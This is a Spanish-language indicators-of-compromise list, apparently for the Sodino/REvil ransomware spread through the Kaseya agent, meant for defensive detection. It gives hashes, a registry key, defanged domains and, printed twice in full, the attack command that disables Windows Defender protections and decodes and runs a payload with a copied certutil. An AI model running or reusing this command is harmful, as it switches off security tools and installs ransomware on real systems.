Indicadores de Compromiso (IoC) Indicadores de Sophos Troj/Ransom-GIP Troj/Ransom-GIQ HPmal/Sodino-A Detected in C:\Windows\MsMpEng.exe DynamicShellcode hmpa.exploit.prevented.1 Cryptoguard cryptoguard.file.detected.1 Procesos de MS-Windows involucrados: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe Parent Path - C:\Program Files (x86)\Kaseya\\AgentMon.exe "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe Parent Path - C:\Program Files (x86)\Kaseya\\AgentMon.exe Ficheros involucrados: C:\windows\cert.exe 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752 C:\windows\msmpeng.exe 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a C:\kworking\agent.crt C:\Windows\mpsvc.dll 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd C:\kworking\agent.exe d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e Llaves de registro: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter Posible extension del Ransomware: -readme.txt Dominios detectados: ncuccr[.]org 1team[.]es 4net[.]guru 35-40konkatsu[.]net 123vrachi[.]ru 4youbeautysalon[.]com 12starhd[.]online 101gowrie[.]com 8449nohate[.]org 1kbk[.]com[.]ua 365questions[.]org 321play[.]com[.]hk candyhouseusa[.]com andersongilmour[.]co[.]uk facettenreich27[.]de blgr[.]be fannmedias[.]com southeasternacademyofprosthodontics[.]org filmstreamingvfcomplet[.]be smartypractice[.]com tanzschule-kieber[.]de iqbalscientific[.]com pasvenska[.]se cursosgratuitosnainternet[.]com bierensgebakkramen[.]nl c2e-poitiers[.]com gonzalezfornes[.]es tonelektro[.]nl milestoneshows[.]com blossombeyond50[.]com thomasvicino[.]com kaotikkustomz[.]com mindpackstudios[.]com faroairporttransfers[.]net daklesa[.]de bxdf[.]info simoneblum[.]de gmto[.]fr cerebralforce[.]net myhostcloud[.]com fotoscondron[.]com sw1m[.]ru homng[.]net